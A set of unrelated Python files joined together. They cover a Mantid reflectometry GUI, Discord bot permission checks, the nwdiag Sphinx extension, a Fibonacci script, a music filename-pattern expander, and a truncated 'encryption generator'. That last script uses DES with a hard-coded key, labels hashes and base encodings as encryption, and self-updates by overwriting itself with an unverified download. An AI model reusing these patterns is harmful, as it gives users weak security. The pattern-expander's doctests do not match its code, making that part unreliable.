stitched_graph = plotSpectrum(outputwksp, 0, True, window=stitched_graph, clearWindow=True)
titl = groupGet(outputwksp, 'samp', 'run_title')
stitched_graph.activeLayer().setTitle(titl)
stitched_graph.activeLayer().setAxisScale(Layer.Left, 1e-8, 100.0, Layer.Log10)
stitched_graph.activeLayer().setAxisScale(Layer.Bottom, Qmin * 0.9, Qmax * 1.1, Layer.Log10)
self.__graphs[outputwksp] = stitched_graph
def __name_trans(self, transrun):
"""
From a comma or colon separated string of run numbers
construct an output workspace name for the transmission workspace that fits the form
TRANS_{trans_1}_{trans_2}
"""
if bool(re.search("^(TRANS)", transrun)):
# The user has deliberately tried to supply the transmission run directly
return transrun
else:
split_trans = re.split(',|:', transrun)
if len(split_trans) == 0:
return None
name = 'TRANS'
for t in split_trans:
name += '_' + str(t)
return name
def _do_run(self, runno, row, which):
"""
Run quick on the given run and row
"""
transrun = str(self.tableMain.item(row, (which * 5) + 2).text())
# Formulate a WS Name for the processed transmission run.
transrun_named = self.__name_trans(transrun)
# Look for existing transmission workspaces that match the name
transmission_ws = None
if mtd.doesExist(transrun_named):
if isinstance(mtd[transrun_named], WorkspaceGroup):
unit = mtd[transrun_named][0].getAxis(0).getUnit().unitID()
else:
unit = mtd[transrun_named].getAxis(0).getUnit().unitID()
if unit == "Wavelength":
logger.notice('Reusing transmission workspace ' + transrun_named)
transmission_ws = mtd[transrun_named]
angle_str = str(self.tableMain.item(row, which * 5 + 1).text())
if len(angle_str) > 0:
angle = float(angle_str)
else:
angle = None
loadedRun = runno
if load_live_runs.is_live_run(runno):
load_live_runs.get_live_data(config['default.instrument'], frequency=self.live_freq,
accumulation=self.live_method)
wlam, wq, th, wqBinned = None, None, None, None
# Only make a transmission workspace if we need one.
if transrun and not transmission_ws:
converter = ConvertToWavelength(transrun)
size = converter.get_ws_list_size()
out_ws_name = transrun_named
if size == 1:
trans1 = converter.get_workspace_from_list(0)
transmission_ws = CreateTransmissionWorkspaceAuto(FirstTransmissionRun=trans1,
OutputWorkspace=out_ws_name,
Params=0.02, StartOverlap=10.0, EndOverlap=12.0,
Version=1)
elif size == 2:
trans1 = converter.get_workspace_from_list(0)
trans2 = converter.get_workspace_from_list(1)
transmission_ws = CreateTransmissionWorkspaceAuto(FirstTransmissionRun=trans1,
OutputWorkspace=out_ws_name,
SecondTransmissionRun=trans2, Params=0.02,
StartOverlap=10.0, EndOverlap=12.0, Version=1)
else:
raise RuntimeError("Up to 2 transmission runs can be specified. No more than that.")
# Load the runs required ConvertToWavelength will deal with the transmission runs, while .to_workspace will deal with the run itself
ws = ConvertToWavelength.to_workspace(loadedRun, ws_prefix="")
if self.__alg_use:
if self.tableMain.item(row, self.scale_col).text():
factor = float(self.tableMain.item(row, self.scale_col).text())
else:
factor = 1.0
if self.tableMain.item(row, 15).text():
Qstep = float(self.tableMain.item(row, 15).text())
else:
Qstep = None
if len(self.tableMain.item(row, which * 5 + 3).text()) > 0:
Qmin = float(self.tableMain.item(row, which * 5 + 3).text())
else:
Qmin = None
if len(self.tableMain.item(row, which * 5 + 4).text()) > 0:
Qmax = float(self.tableMain.item(row, which * 5 + 4).text())
else:
Qmax = None
# If we're dealing with a workspace group, we'll manually map execution over each group member
# We do this so we can get ThetaOut correctly (see ticket #10597 for why we can't at the moment)
if isinstance(ws, WorkspaceGroup):
wqGroupBinned = []
wqGroup = []
wlamGroup = []
thetaGroup = []
group_trans_ws = transmission_ws
for i in range(0, ws.size()):
# If the transmission workspace is a group, we'll use it pair-wise with the tof workspace group
if isinstance(transmission_ws, WorkspaceGroup):
group_trans_ws = transmission_ws[i]
alg = AlgorithmManager.create("ReflectometryReductionOneAuto")
alg.initialize()
alg.setProperty("InputWorkspace", ws[i])
if group_trans_ws:
alg.setProperty("FirstTransmissionRun", group_trans_ws)
if angle is not None:
alg.setProperty("ThetaIn", angle)
alg.setProperty("OutputWorkspaceBinned", runno + '_IvsQ_binned_' + str(i + 1))
alg.setProperty("OutputWorkspace", runno + '_IvsQ_' + str(i + 1))
alg.setProperty("OutputWorkspaceWavelength", runno + '_IvsLam_' + str(i + 1))
alg.setProperty("ScaleFactor", factor)
if Qstep is not None:
alg.setProperty("MomentumTransferStep", Qstep)
if Qmin is not None:
alg.setProperty("MomentumTransferMin", Qmin)
if Qmax is not None:
alg.setProperty("MomentumTransferMax", Qmax)
alg.execute()
wqBinned = mtd[runno + '_IvsQ_binned_' + str(i + 1)]
wq = mtd[runno + '_IvsQ_' + str(i + 1)]
wlam = mtd[runno + '_IvsLam_' + str(i + 1)]
th = alg.getProperty("ThetaIn").value
wqGroupBinned.append(wqBinned)
wqGroup.append(wq)
wlamGroup.append(wlam)
thetaGroup.append(th)
wqBinned = GroupWorkspaces(InputWorkspaces=wqGroupBinned, OutputWorkspace=runno + '_IvsQ_binned')
wq = GroupWorkspaces(InputWorkspaces=wqGroup, OutputWorkspace=runno + '_IvsQ')
wlam = GroupWorkspaces(InputWorkspaces=wlamGroup, OutputWorkspace=runno + '_IvsLam')
th = thetaGroup[0]
else:
alg = AlgorithmManager.create("ReflectometryReductionOneAuto")
alg.initialize()
alg.setProperty("InputWorkspace", ws)
if transmission_ws:
alg.setProperty("FirstTransmissionRun", transmission_ws)
if angle is not None:
alg.setProperty("ThetaIn", angle)
alg.setProperty("OutputWorkspaceBinned", runno + '_IvsQ_binned')
alg.setProperty("OutputWorkspace", runno + '_IvsQ')
alg.setProperty("OutputWorkspaceWavelength", runno + '_IvsLam')
alg.setProperty("ScaleFactor", factor)
if Qstep is not None:
alg.setProperty("MomentumTransferStep", Qstep)
if Qmin is not None:
alg.setProperty("MomentumTransferMin", Qmin)
if Qmax is not None:
alg.setProperty("MomentumTransferMax", Qmax)
alg.execute()
wqBinned = mtd[runno + '_IvsQ_binned']
wq = mtd[runno + '_IvsQ']
wlam = mtd[runno + '_IvsLam']
th = alg.getProperty("ThetaIn").value
cleanup()
else:
wlam, wq, th = quick(loadedRun, trans=transmission_ws, theta=angle, tof_prefix="")
if self.__group_tof_workspaces and not isinstance(ws, WorkspaceGroup):
if "TOF" in mtd:
tof_group = mtd["TOF"]
if not tof_group.contains(loadedRun):
tof_group.add(loadedRun)
else:
tof_group = GroupWorkspaces(InputWorkspaces=loadedRun, OutputWorkspace="TOF")
if ':' in runno:
runno = runno.split(':')[0]
if ',' in runno:
runno = runno.split(',')[0]
if isinstance(wq, WorkspaceGroup):
inst = wq[0].getInstrument()
else:
inst = wq.getInstrument()
lmin = inst.getNumberParameter('LambdaMin')[0]
lmax = inst.getNumberParameter('LambdaMax')[0]
qmin = 4 * math.pi / lmax * math.sin(th * math.pi / 180)
qmax = 4 * math.pi / lmin * math.sin(th * math.pi / 180)
return th, qmin, qmax, wlam, wqBinned, wq
def _save_table_contents(self, filename):
"""
Save the contents of the table
"""
try:
writer = csv.writer(open(filename, "wb"))
for row in range(self.tableMain.rowCount()):
rowtext = []
for column in range(self.tableMain.columnCount() - 2):
rowtext.append(self.tableMain.item(row, column).text())
if len(rowtext) > 0:
writer.writerow(rowtext)
self.current_table = filename
logger.notice("Saved file to " + filename)
self.mod_flag = False
except:
return False
self.mod_flag = False
return True
def _save(self, failsave=False):
"""
Save the table, showing no interface if not necessary. This also provides the failing save functionality.
"""
filename = ''
if failsave:
# this is an emergency autosave as the program is failing
logger.error(
"The ISIS Reflectonomy GUI has encountered an error, it will now attempt to save a copy of your work.")
msgBox = QtGui.QMessageBox()
msgBox.setText(
"The ISIS Reflectonomy GUI has encountered an error, it will now attempt to save a copy of your work.\n"
"Please check the log for details.")
msgBox.setStandardButtons(QtGui.QMessageBox.Ok)
msgBox.setIcon(QtGui.QMessageBox.Critical)
msgBox.setDefaultButton(QtGui.QMessageBox.Ok)
msgBox.setEscapeButton(QtGui.QMessageBox.Ok)
msgBox.exec_()
import datetime
failtime = datetime.datetime.today().strftime('%Y-%m-%d_%H-%M-%S')
if self.current_table:
filename = self.current_table.rsplit('.', 1)[0] + "_recovered_" + failtime + ".tbl"
else:
mantidDefault = config['defaultsave.directory']
if os.path.exists(mantidDefault):
filename = os.path.join(mantidDefault, "mantid_reflectometry_recovered_" + failtime + ".tbl")
else:
import tempfile
tempDir = tempfile.gettempdir()
filename = os.path.join(tempDir, "mantid_reflectometry_recovered_" + failtime + ".tbl")
else:
# this is a save-on-quit or file->save
if self.current_table:
filename = self.current_table
else:
saveDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Save Table")
saveDialog.setFileMode(QtGui.QFileDialog.AnyFile)
saveDialog.setNameFilter("Table Files (*.tbl);;All files (*)")
saveDialog.setDefaultSuffix("tbl")
saveDialog.setAcceptMode(QtGui.QFileDialog.AcceptSave)
if saveDialog.exec_():
filename = saveDialog.selectedFiles()[0]
else:
return False
return self._save_table_contents(filename)
def _save_as(self):
"""
show the save as dialog and save to a .tbl file with that name
"""
saveDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Save Table")
saveDialog.setFileMode(QtGui.QFileDialog.AnyFile)
saveDialog.setNameFilter("Table Files (*.tbl);;All files (*)")
saveDialog.setDefaultSuffix("tbl")
saveDialog.setAcceptMode(QtGui.QFileDialog.AcceptSave)
if saveDialog.exec_():
filename = saveDialog.selectedFiles()[0]
self._save_table_contents(filename)
def _load_table(self):
"""
Load a .tbl file from disk
"""
self.loading = True
loadDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Open Table")
loadDialog.setFileMode(QtGui.QFileDialog.ExistingFile)
loadDialog.setNameFilter("Table Files (*.tbl);;All files (*)")
if loadDialog.exec_():
try:
# before loading make sure you give them a chance to save
if self.mod_flag:
ret, _saved = self._save_check()
if ret == QtGui.QMessageBox.RejectRole:
# if they hit cancel abort the load
self.loading = False
return
self._reset_table()
filename = loadDialog.selectedFiles()[0]
self.current_table = filename
reader = csv.reader(open(filename, "rb"))
row = 0
for line in reader:
if row < 100:
for column in range(self.tableMain.columnCount() - 2):
item = QtGui.QTableWidgetItem()
item.setText(line[column])
self.tableMain.setItem(row, column, item)
row = row + 1
except:
logger.error('Could not load file: ' + str(filename) + '. File not found or unable to read from file.')
self.loading = False
self.mod_flag = False
def _reload_table(self):
"""
Reload the last loaded file from disk, replacing anything in the table already
"""
self.loading = True
filename = self.current_table
if filename:
if self.mod_flag:
msgBox = QtGui.QMessageBox()
msgBox.setText(
"The table has been modified. Are you sure you want to reload the table and lose your changes?")
msgBox.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
msgBox.setIcon(QtGui.QMessageBox.Question)
msgBox.setDefaultButton(QtGui.QMessageBox.Yes)
msgBox.setEscapeButton(QtGui.QMessageBox.No)
ret = msgBox.exec_()
if ret == QtGui.QMessageBox.No:
# if they hit No abort the reload
self.loading = False
return
try:
self._reset_table()
reader = csv.reader(open(filename, "rb"))
row = 0
for line in reader:
if row < 100:
for column in range(self.tableMain.columnCount() - 2):
item = QtGui.QTableWidgetItem()
item.setText(line[column])
self.tableMain.setItem(row, column, item)
row = row + 1
self.mod_flag = False
except:
logger.error('Could not load file: ' + str(filename) + '. File not found or unable to read from file.')
else:
logger.notice('No file in table to reload.')
self.loading = False
def _save_workspaces(self):
"""
Shows the export dialog for saving workspaces to non mantid formats
"""
try:
Dialog = QtGui.QDialog()
u = Ui_SaveWindow()
u.setupUi(Dialog)
Dialog.exec_()
except Exception as ex:
logger.notice("Could not open save workspace dialog")
logger.notice(str(ex))
def _options_dialog(self):
"""
Shows the dialog for setting options regarding live data
"""
try:
dialog_controller = ReflOptions(def_method=self.live_method, def_freq=self.live_freq,
def_alg_use=self.__alg_use,
def_icat_download=self.__icat_download,
def_group_tof_workspaces=self.__group_tof_workspaces,
def_stitch_right=self.__scale_right)
if dialog_controller.exec_():
# Fetch the settings back off the controller
self.live_freq = dialog_controller.frequency()
self.live_method = dialog_controller.method()
self.__alg_use = dialog_controller.useAlg()
self.__icat_download = dialog_controller.icatDownload()
self.__group_tof_workspaces = dialog_controller.groupTOFWorkspaces()
self.__scale_right = dialog_controller.stitchRight()
# Persist the settings
settings = QtCore.QSettings()
settings.beginGroup(self.__live_data_settings)
settings.setValue(self.__live_data_frequency_key, self.live_freq)
settings.setValue(self.__live_data_method_key, self.live_method)
settings.endGroup()
settings.beginGroup(self.__generic_settings)
settings.setValue(self.__ads_use_key, self.__alg_use)
settings.setValue(self.__icat_download_key, self.__icat_download)
settings.setValue(self.__group_tof_workspaces_key, self.__group_tof_workspaces)
settings.setValue(self.__stitch_right_key, self.__scale_right)
settings.endGroup()
del settings
except Exception as ex:
logger.notice("Problem opening options dialog or problem retrieving values from dialog")
logger.notice(str(ex))
def _choose_columns(self):
"""
shows the choose columns dialog for hiding and revealing of columns
"""
try:
dialog = ReflChoose(self.shown_cols, self.tableMain)
if dialog.exec_():
settings = QtCore.QSettings()
settings.beginGroup(self.__column_settings)
for key, value in dialog.visiblestates.iteritems():
self.shown_cols[key] = value
settings.setValue(str(key), value)
if value:
self.tableMain.showColumn(key)
else:
self.tableMain.hideColumn(key)
settings.endGroup()
del settings
except Exception as ex:
logger.notice("Could not open choose columns dialog")
logger.notice(str(ex))
def _show_help(self):
"""
Launches the wiki page for this interface
"""
import webbrowser
webbrowser.open('http://www.mantidproject.org/ISIS_Reflectometry_GUI')
def getLogValue(wksp, field=''):
"""
returns the last value from a sample log
"""
ws = getWorkspace(wksp)
log = ws.getRun().getLogData(field).value
if isinstance(log, int) or isinstance(log, str):
return log
else:
return log[-1]
def getWorkspace(wksp, report_error=True):
"""
Gets the first workspace associated with the given string. Does not load.
"""
if isinstance(wksp, Workspace):
return wksp
elif isinstance(wksp, str):
exists = mtd.doesExist(wksp)
if not exists:
if report_error:
logger.error("Unable to get workspace: " + str(wksp))
return exists # Doesn't exist
else:
return exists # Doesn't exist
elif isinstance(mtd[wksp], WorkspaceGroup):
wout = mtd[wksp][0]
else:
wout = mtd[wksp]
return wout
|
from discord.ext import commands
import discord.utils
def is_owner_check(ctx):
author = str(ctx.message.author)
owner = ctx.bot.config['master']
return author == owner
def is_owner():
return commands.check(is_owner_check)
def check_permissions(ctx, perms):
#if is_owner_check(ctx):
# return True
if not perms:
return False
ch = ctx.message.channel
author = ctx.message.author
resolved = ch.permissions_for(author)
return all(getattr(resolved, name, None) == value for name, value in perms.items())
def role_or_permissions(ctx, check, **perms):
if check_permissions(ctx, perms):
return True
ch = ctx.message.channel
author = ctx.message.author
if ch.is_private:
return False # can't have roles in PMs
role = discord.utils.find(check, author.roles)
return role is not None
def serverowner_or_permissions(**perms):
def predicate(ctx):
owner = ctx.message.server.owner
if ctx.message.author.id == owner.id:
return True
return check_permissions(ctx,perms)
return commands.check(predicate)
def serverowner():
return serverowner_or_permissions()
def check_wantchannel(ctx):
if ctx.message.server is None:
return False
channel = ctx.message.channel
server = ctx.message.server
try:
want_channels = ctx.bot.server_dict[server]['want_channel_list']
except KeyError:
return False
if channel in want_channels:
return True
def check_citychannel(ctx):
if ctx.message.server is None:
return False
channel = ctx.message.channel.name
server = ctx.message.server
try:
city_channels = ctx.bot.server_dict[server]['city_channels'].keys()
except KeyError:
return False
if channel in city_channels:
return True
def check_raidchannel(ctx):
if ctx.message.server is None:
return False
channel = ctx.message.channel
server = ctx.message.server
try:
raid_channels = ctx.bot.server_dict[server]['raidchannel_dict'].keys()
except KeyError:
return False
if channel in raid_channels:
return True
def check_eggchannel(ctx):
if ctx.message.server is None:
return False
channel = ctx.message.channel
server = ctx.message.server
try:
type = ctx.bot.server_dict[server]['raidchannel_dict'][channel]['type']
except KeyError:
return False
if type == 'egg':
return True
def check_raidactive(ctx):
if ctx.message.server is None:
return False
channel = ctx.message.channel
server = ctx.message.server
try:
return ctx.bot.server_dict[server]['raidchannel_dict'][channel]['active']
except KeyError:
return False
def check_raidset(ctx):
if ctx.message.server is None:
return False
server = ctx.message.server
try:
return ctx.bot.server_dict[server]['raidset']
except KeyError:
return False
def check_wildset(ctx):
if ctx.message.server is None:
return False
server = ctx.message.server
try:
return ctx.bot.server_dict[server]['wildset']
except KeyError:
return False
def check_wantset(ctx):
if ctx.message.server is None:
return False
server = ctx.message.server
try:
return ctx.bot.server_dict[server]['wantset']
except KeyError:
return False
def check_teamset(ctx):
if ctx.message.server is None:
return False
server = ctx.message.server
try:
return ctx.bot.server_dict[server]['team']
except KeyError:
return False
def teamset():
def predicate(ctx):
return check_teamset(ctx)
return commands.check(predicate)
def wantset():
def predicate(ctx):
return check_wantset(ctx)
return commands.check(predicate)
def wildset():
def predicate(ctx):
return check_wildset(ctx)
return commands.check(predicate)
def raidset():
def predicate(ctx):
return check_raidset(ctx)
return commands.check(predicate)
def citychannel():
def predicate(ctx):
return check_citychannel(ctx)
return commands.check(predicate)
def wantchannel():
def predicate(ctx):
if check_wantset(ctx):
return check_wantchannel(ctx)
return commands.check(predicate)
def raidchannel():
def predicate(ctx):
return check_raidchannel(ctx)
return commands.check(predicate)
def notraidchannel():
def predicate(ctx):
return not check_raidchannel(ctx)
return commands.check(predicate)
def activeraidchannel():
def predicate(ctx):
if check_raidchannel(ctx):
return check_raidactive(ctx)
return commands.check(predicate)
def cityraidchannel():
def predicate(ctx):
if check_raidchannel(ctx) == True:
return True
elif check_citychannel(ctx) == True:
return True
return commands.check(predicate)
def cityeggchannel():
def predicate(ctx):
if check_raidchannel(ctx) == True:
if check_eggchannel(ctx) == True:
return True
elif check_citychannel(ctx) == True:
return True
return commands.check(predicate)
|
"""
nwdiag.sphinx_ext
~~~~~~~~~~~~~~~~~~~~
Allow nwdiag-formatted diagrams to be included in Sphinx-generated
documents inline.
:copyright: Copyright 2010 by Takeshi Komiya.
:license: BSDL.
"""
from __future__ import absolute_import
import os
import re
import traceback
from collections import namedtuple
from docutils import nodes
from sphinx import addnodes
from sphinx.util.osutil import ensuredir
import nwdiag.utils.rst.nodes
import nwdiag.utils.rst.directives
from blockdiag.utils.bootstrap import detectfont
from blockdiag.utils.compat import u, string_types
from blockdiag.utils.fontmap import FontMap
fontmap = None
class nwdiag_node(nwdiag.utils.rst.nodes.nwdiag):
def to_drawer(self, image_format, builder, **kwargs):
if 'filename' in kwargs:
filename = kwargs.pop('filename')
else:
filename = self.get_abspath(image_format, builder)
antialias = builder.config.nwdiag_antialias
image = super(nwdiag_node, self).to_drawer(image_format, filename, fontmap,
antialias=antialias, **kwargs)
for node in image.diagram.traverse_nodes():
node.href = resolve_reference(builder, node.href)
return image
def get_relpath(self, image_format, builder):
options = dict(antialias=builder.config.nwdiag_antialias,
fontpath=builder.config.nwdiag_fontpath,
fontmap=builder.config.nwdiag_fontmap,
format=image_format)
outputdir = getattr(builder, 'imgpath', builder.outdir)
return os.path.join(outputdir, self.get_path(**options))
def get_abspath(self, image_format, builder):
options = dict(antialias=builder.config.nwdiag_antialias,
fontpath=builder.config.nwdiag_fontpath,
fontmap=builder.config.nwdiag_fontmap,
format=image_format)
if hasattr(builder, 'imgpath'):
outputdir = os.path.join(builder.outdir, '_images')
else:
outputdir = builder.outdir
path = os.path.join(outputdir, self.get_path(**options))
ensuredir(os.path.dirname(path))
return path
class Nwdiag(nwdiag.utils.rst.directives.NwdiagDirective):
node_class = nwdiag_node
def node2image(self, node, diagram):
return node
def resolve_reference(builder, href):
if href is None:
return None
pattern = re.compile(u("^:ref:`(.+?)`"), re.UNICODE)
matched = pattern.search(href)
if matched is None:
return href
else:
refid = matched.group(1)
domain = builder.env.domains['std']
node = addnodes.pending_xref(refexplicit=False)
xref = domain.resolve_xref(builder.env, builder.current_docname, builder,
'ref', refid, node, node)
if xref:
if 'refid' in xref:
return "#" + xref['refid']
else:
return xref['refuri']
else:
builder.warn('undefined label: %s' % refid)
return None
def html_render_svg(self, node):
image = node.to_drawer('SVG', self.builder, filename=None, nodoctype=True)
image.draw()
if 'align' in node['options']:
align = node['options']['align']
self.body.append('<div align="%s" class="align-%s">' % (align, align))
self.context.append('</div>\n')
else:
self.body.append('<div>')
self.context.append('</div>\n')
# reftarget
for node_id in node['ids']:
self.body.append('<span id="%s"></span>' % node_id)
# resize image
size = image.pagesize().resize(**node['options'])
self.body.append(image.save(size))
self.context.append('')
def html_render_clickablemap(self, image, width_ratio, height_ratio):
href_nodes = [node for node in image.nodes if node.href]
if not href_nodes:
return
self.body.append('<map name="map_%d">' % id(image))
for node in href_nodes:
x1, y1, x2, y2 = image.metrics.cell(node)
x1 *= width_ratio
x2 *= width_ratio
y1 *= height_ratio
y2 *= height_ratio
areatag = '<area shape="rect" coords="%s,%s,%s,%s" href="%s">' % (x1, y1, x2, y2, node.href)
self.body.append(areatag)
self.body.append('</map>')
def html_render_png(self, node):
image = node.to_drawer('PNG', self.builder)
if not os.path.isfile(image.filename):
image.draw()
image.save()
# align
if 'align' in node['options']:
align = node['options']['align']
self.body.append('<div align="%s" class="align-%s">' % (align, align))
self.context.append('</div>\n')
else:
self.body.append('<div>')
self.context.append('</div>')
# link to original image
relpath = node.get_relpath('PNG', self.builder)
if 'width' in node['options'] or 'height' in node['options'] or 'scale' in node['options']:
self.body.append('<a class="reference internal image-reference" href="%s">' % relpath)
self.context.append('</a>')
else:
self.context.append('')
# <img> tag
original_size = image.pagesize()
resized = original_size.resize(**node['options'])
img_attr = dict(src=relpath,
width=resized.width,
height=resized.height)
if any(node.href for node in image.nodes):
img_attr['usemap'] = "#map_%d" % id(image)
width_ratio = float(resized.width) / original_size.width
height_ratio = float(resized.height) / original_size.height
html_render_clickablemap(self, image, width_ratio, height_ratio)
if 'alt' in node['options']:
img_attr['alt'] = node['options']['alt']
self.body.append(self.starttag(node, 'img', '', empty=True, **img_attr))
def html_visit_nwdiag(self, node):
try:
image_format = get_image_format_for(self.builder)
if image_format.upper() == 'SVG':
html_render_svg(self, node)
else:
html_render_png(self, node)
except UnicodeEncodeError:
if self.builder.config.nwdiag_debug:
traceback.print_exc()
msg = ("nwdiag error: UnicodeEncodeError caught "
"(check your font settings)")
self.builder.warn(msg)
raise nodes.SkipNode
except Exception as exc:
if self.builder.config.nwdiag_debug:
traceback.print_exc()
self.builder.warn('dot code %r: %s' % (node['code'], str(exc)))
raise nodes.SkipNode
def html_depart_nwdiag(self, node):
self.body.append(self.context.pop())
self.body.append(self.context.pop())
def get_image_format_for(builder):
if builder.format == 'html':
image_format = builder.config.nwdiag_html_image_format.upper()
elif builder.format == 'latex':
if builder.config.nwdiag_tex_image_format:
image_format = builder.config.nwdiag_tex_image_format.upper()
else:
image_format = builder.config.nwdiag_latex_image_format.upper()
else:
image_format = 'PNG'
if image_format.upper() not in ('PNG', 'PDF', 'SVG'):
raise ValueError('unknown format: %s' % image_format)
if image_format.upper() == 'PDF':
try:
import reportlab # NOQA: importing test
except ImportError:
raise ImportError('Could not output PDF format. Install reportlab.')
return image_format
def on_builder_inited(self):
# show deprecated message
if self.builder.config.nwdiag_tex_image_format:
self.builder.warn('nwdiag_tex_image_format is deprecated. Use nwdiag_latex_image_format.')
# initialize fontmap
global fontmap
try:
fontmappath = self.builder.config.nwdiag_fontmap
fontmap = FontMap(fontmappath)
except:
fontmap = FontMap(None)
try:
fontpath = self.builder.config.nwdiag_fontpath
if isinstance(fontpath, string_types):
fontpath = [fontpath]
if fontpath:
config = namedtuple('Config', 'font')(fontpath)
fontpath = detectfont(config)
fontmap.set_default_font(fontpath)
except:
pass
def on_doctree_resolved(self, doctree, docname):
if self.builder.format == 'html':
return
try:
image_format = get_image_format_for(self.builder)
except Exception as exc:
if self.builder.config.nwdiag_debug:
traceback.print_exc()
self.builder.warn('nwdiag error: %s' % exc)
for node in doctree.traverse(nwdiag_node):
node.parent.remove(node)
return
for node in doctree.traverse(nwdiag_node):
try:
relfn = node.get_relpath(image_format, self.builder)
image = node.to_drawer(image_format, self.builder)
if not os.path.isfile(image.filename):
image.draw()
image.save()
image = nodes.image(uri=image.filename, candidates={'*': relfn}, **node['options'])
node.parent.replace(node, image)
except Exception as exc:
if self.builder.config.nwdiag_debug:
traceback.print_exc()
self.builder.warn('dot code %r: %s' % (node['code'], str(exc)))
node.parent.remove(node)
def setup(app):
app.add_node(nwdiag_node,
html=(html_visit_nwdiag, html_depart_nwdiag))
app.add_directive('nwdiag', Nwdiag)
app.add_config_value('nwdiag_fontpath', None, 'html')
app.add_config_value('nwdiag_fontmap', None, 'html')
app.add_config_value('nwdiag_antialias', False, 'html')
app.add_config_value('nwdiag_debug', False, 'html')
app.add_config_value('nwdiag_html_image_format', 'PNG', 'html')
app.add_config_value('nwdiag_tex_image_format', None, 'html') # backward compatibility for 0.6.1
app.add_config_value('nwdiag_latex_image_format', 'PNG', 'html')
app.connect("builder-inited", on_builder_inited)
app.connect("doctree-resolved", on_doctree_resolved)
|
import sys
def fib(n):
if(n<=2):
return (n-1)
else:
return fib(n-1)+fib(n-2)
if ( len(sys.argv) == 2 ):
print fib(int(sys.argv[1]))
else:
print "Usage : "+sys.argv[0]+" <term required>"
|
import consts
import urlparse
import urllib
import os.path
from errors import PatternException
def expand_file(pattern, metadata):
"""
Expands the pattern to a file name according to the infomation of a music
The following are supported place holder in the pattern:
- %t: Title of the track. 'title' in metadata
- %p: Performer (artist) of the music. 'artist' in metadata
- %a: Album of the music. 'album' in metadata
- %n: Track number of the music. 'tracknumber' in metadata
- %f: Filename without extension of the music. 'location' in metadata.
- %%: The `%' punctuation
Arguments:
- `pattern`: The pattern to expand.
- `metadata`: A dict representing metadata. Useful keys are listed above.
If the pattern cannot be expand, raise an PatternException. Otherwise
return the expended pattern.
>>> metadata = {'artist': 'Foo',
... 'title': 'Bar',
... 'tracknumber': '1',
... 'album': 'Album',
... 'location': 'file:///%E6%AD%8C%E6%9B%B2/%E7%9A%84/%E5%9C%B0%E5%9D%80.mp3'}
>>> expand_file('%p - %t', metadata)
'Foo - Bar'
>>> expand_file('foobar', metadata)
'foobar'
>>> print expand_file('name is %f :)', metadata)
name is 地址 :)
>>> expand_file('%something else', metadata)
'%something else'
>>> expand_file('%%a - %%t', metadata)
'%a - %t'
>>> expand_file('%%%', metadata)
'%%'
>>> expand_file('%n - %a:%p,%t', metadata)
'1 - Album:Foo,Bar'
>>> expand_file('%t', {})
Traceback (most recent call last):
...
PatternException: 'title not in metadata'
"""
keys = {'t': 'title',
'p': 'artist',
'a': 'album',
'n': 'tracknum',
}
start = 0
parts = []
while start < len(pattern):
end = pattern.find('%', start)
if end > -1:
parts.append(pattern[start:end])
has_tag = False
if end + 1 < len(pattern):
tag = pattern[end + 1]
if tag == '%':
has_tag = True
parts.append('%')
elif tag == 'f':
location = metadata.location
if not location:
raise PatternException('Location not found in metadata')
uri = urlparse.urlparse(location)
if uri.scheme != '' and not uri.scheme in ['file']:
raise PatternException('Unsupported file scheme %s' % uri.scheme)
if uri.scheme == '':
path = uri.path
else:
path = urllib.url2pathname(uri.path)
basename = os.path.basename(path)
root, ext = os.path.splitext(basename)
has_tag = True
parts.append(root)
elif tag in keys:
value = getattr(metadata, keys[tag])
if not value:
raise PatternException('%s not in metadata' % keys[tag])
has_tag = True
parts.append(value)
if has_tag:
start = end + 2
else:
start = end + 1
parts.append('%')
else:
parts.append(pattern[start:])
break
return ''.join(parts)
def expand_path(pattern, metadata):
"""
Expands the pattern to a directory path according to the infomation of a music
The pattern can be one of the three forms:
- begin with `/': the path is an absolute path and will not be expanded
- begin with `~/': the path is an relative path and the `~' wiil be expanded to
the absolute path of the user's home directory
- `%': the path will be expanded to the directory of the music file according to
its URI. ``location`` attribute is used in metadata
Arguments:
- `pattern`: The pattern to expand.
- `metadata`: A dict representing metadata. Useful keys are listed above.
If the pattern cannot be expand, raise an PatternException. Otherwise
return the expended pattern.
>>> expand_path('%', {'location': 'file:///tmp/a.lrc'})
'/tmp'
>>> expand_path('%foo', {'location': 'file:///tmp/a.lrc'})
'%foo'
>>> expand_path('/bar', {})
'/bar'
>>> expand_path('%', {'Title': 'hello'})
Traceback (most recent call last):
...
PatternException: 'Location not found in metadata'
"""
if pattern == '%':
location = metadata.location
if not location:
raise PatternException('Location not found in metadata')
uri = urlparse.urlparse(location)
if not uri.scheme in ['file']:
raise PatternException('Unsupported file scheme %s' % uri.scheme)
path = urllib.url2pathname(uri.path)
return os.path.dirname(path)
return os.path.expanduser(pattern)
if __name__ == '__main__':
import doctest
doctest.testmod()
|
import os
import sys
import time
import base64
import urllib
import hashlib
import subprocess
from datetime import date
from datetime import datetime
from Crypto.Cipher import DES
from Crypto import Random
date=date.today()
now=datetime.now()
if os.name in ['nt','win32']:
os.system('cls')
else:
os.system('clear')
print "[*] Author Netuser [*]"
print "[*] encryption generator [*]"
print "[*] date :",date," [*]"
print
print "[*] Encrypt With Strong Crypto is Coming soon"
back = 'back'
while True:
try:
menu=raw_input('\n[*] encrypt or decrypt $ ')
menu_item="update"
if menu_item == menu:
print "[*] Updating Databases Information .... "
url=urllib.urlretrieve("https://raw.githubusercontent.com/P1d0f/encryptGen/master/encryption-generator.py","encryption-generator.py")
print "[*] Update Succesfully"
sys.exit()
menu_item="help"
if menu == menu_item:
print """
you just type encrypt or decrypt
example :
encrypt = encrypt or decrypt $ encrypt (enter)
decrypt = encrypt or decrypt $ decrypt (enter)
"""
menu_item="encrypt"
if menu == menu_item:
print
print "----> md5"
print "----> sha1"
print "----> sha224"
print "----> sha256"
print "----> sha384"
print "----> sha512"
print "----> base16"
print "----> base32"
print "----> base64"
print "----> cryptoDES"
print
raw=raw_input('[*] type and choice one $ ')
menu_item="exit"
if raw == menu_item:
print "[*] thanks for shopping"
sys.exit()
menu_item="cryptoDES"
if menu_item == raw:
telo=raw_input('[*] your text $ ')
iv=Random.get_random_bytes(8)
des1=DES.new('01234567', DES.MODE_CFB, iv)
des2=DES.new('01234567', DES.MODE_CFB, iv)
text=telo
cipher_text=des2.encrypt(text)
nama_file=open('text.encrypt','w')
